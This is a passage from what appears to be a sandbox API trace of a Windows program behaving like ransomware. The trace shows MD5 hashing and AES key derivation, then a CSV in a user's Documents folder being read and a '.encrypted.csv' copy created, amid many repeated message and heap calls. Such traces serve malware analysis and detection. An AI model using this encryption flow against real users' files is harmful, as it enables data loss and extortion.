out: lpMsg=0x6ae38c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.618] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.618] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.618] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.619] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.619] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.619] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.619] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.619] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.619] CryptHashData (hHash=0x7c2240, pbData=0x7c97b8, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0034.619] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.619] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.619] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.619] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.620] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.620] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.620] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.620] CryptDestroyHash (hHash=0x7c2240) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.620] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0034.620] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\nc9n uj.csv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.621] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.621] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.621] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.621] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.621] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2a8 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100) returned 0x7c97b8 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a60 | out: hHeap=0x770000) returned 1 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0034.622] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791268 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c97b8 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.622] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd0) returned 0x791190 [0034.623] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw")) returned 0x10 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791190 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x791268 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.623] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0034.623] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.623] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\NC9n Uj.encrypted.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\hdwgqzq\\shrw\\nc9n uj.encrypted.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c60 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b87d0 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.624] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0034.624] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.624] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.625] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.625] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.625] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.625] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0034.627] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x58e5, lpOverlapped=0x0) returned 1 [0034.628] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0034.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0034.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.628] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x158e5) returned 0x955018 [0034.628] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0034.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.629] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0034.629] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x158e5) returned 0x96a908 [0034.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.630] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.630] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x158e5) returned 0x955018 [0034.630] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.631] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0034.631] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0034.631] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.631] 